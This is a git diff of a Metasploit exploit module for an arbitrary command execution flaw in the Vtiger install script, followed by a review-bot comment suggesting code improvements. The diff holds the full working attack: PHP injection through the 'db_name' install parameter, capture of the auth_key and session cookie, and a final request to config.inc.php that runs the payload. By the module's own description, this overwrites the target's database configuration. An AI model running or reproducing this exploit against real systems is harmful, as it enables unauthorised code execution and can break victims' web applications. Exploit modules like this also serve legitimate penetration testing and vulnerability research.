Fix everything that needs to be fixed
parent
ca7dcc0781
commit
4012dd0acc
|
@ -6,7 +6,9 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking # Application database configuration is overwritten
|
||||
|
||||
# Application database configuration is overwritten
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
@ -16,12 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution vulnerability in the
|
||||
Vtiger install script. This module is set to ManualRanking due to this
|
||||
module overwriting the target database configuration, which may introduce target
|
||||
instability.
|
||||
module overwriting the target database configuration, which may result in
|
||||
a broken web app, and you may not be able to get a session again.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Jonathan Borgeaud < research[at]navixia.com >', # Navixia Research Team
|
||||
'Jonathan Borgeaud < research[at]navixia.com >' # Navixia Research Team
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -51,62 +53,63 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def uri
|
||||
return target_uri.path
|
||||
end
|
||||
|
||||
def check
|
||||
return Exploit::CheckCode::Unsupported
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Injecting payload...")
|
||||
rand_arg = Rex::Text.rand_text_hex(10)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' =>
|
||||
{
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
|
||||
'vars_get' => {
|
||||
'module' => 'Install',
|
||||
'view' => 'Index',
|
||||
'mode' => 'Step5',
|
||||
'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // ",
|
||||
},
|
||||
'headers' => {'X-Requested-With' => 'whatever'}
|
||||
})
|
||||
'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // "
|
||||
}})
|
||||
|
||||
re_authkey='(name)(=)(")(auth_key)(")(\\s+)(value)(=)(").*?((?:[a-z0-9]*))(")'
|
||||
m=Regexp.new(re_authkey,Regexp::IGNORECASE);
|
||||
# Check timeout
|
||||
if not res
|
||||
print_error("Request timed out, please try again")
|
||||
return
|
||||
end
|
||||
|
||||
if m.match(res.body)
|
||||
authkey=m.match(res.body)[10]
|
||||
if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i
|
||||
authkey = $1
|
||||
phpsessid = res.get_cookies
|
||||
print_status("Retrieved Authkey : #{authkey}");
|
||||
print_status("Retrieved PHPSESSID : #{phpsessid}");
|
||||
|
||||
if authkey.blank?
|
||||
print_error("No AuthKey found")
|
||||
return
|
||||
elsif phpsessid.blank?
|
||||
print_error("No PHP Session ID found")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Retrieved Authkey : #{authkey}")
|
||||
print_status("Retrieved PHPSESSID : #{phpsessid}")
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
|
||||
'cookie' => phpsessid,
|
||||
'vars_get' =>
|
||||
{
|
||||
'module' => 'Install',
|
||||
'view' => 'Index',
|
||||
'mode' => 'Step7',
|
||||
'auth_key' => authkey
|
||||
},
|
||||
'headers' => {'X-Requested-With' => 'pwned'},
|
||||
'cookie' => phpsessid
|
||||
}
|
||||
})
|
||||
|
||||
print_status("Executing payload...")
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'config.inc.php'),
|
||||
'vars_get' =>
|
||||
{
|
||||
rand_arg => '1',
|
||||
}
|
||||
'uri' => normalize_uri(target_uri.path, 'config.inc.php'),
|
||||
'vars_get' => { rand_arg => '1' }
|
||||
})
|
||||
else
|
||||
print_error("No auth_key pattern found")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
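Review bot: The response of the Step7 `send_request_cgi` call is discarded, so a timeout on that request is never reported and the method proceeds straight to the `config.inc.php` request; the guard that already follows the Step5 request (`unless res` / `print_error("Request timed out, please try again")` / `return`) belongs after the Step7 call as well, which means assigning its result to a local first. The existing guard is written `if not res`, which idiomatic Ruby spells `unless res`. `authkey = $1` reads more clearly as `authkey = Regexp.last_match(1)`, and in the regex the `(?:[a-z0-9]*)` inside the capture group is a redundant non-capturing wrapper that can simply be `([a-z0-9]*)`. The `exploit` method and the enclosing `Metasploit3` class both close inside this hunk, while the class header sits in the first hunk.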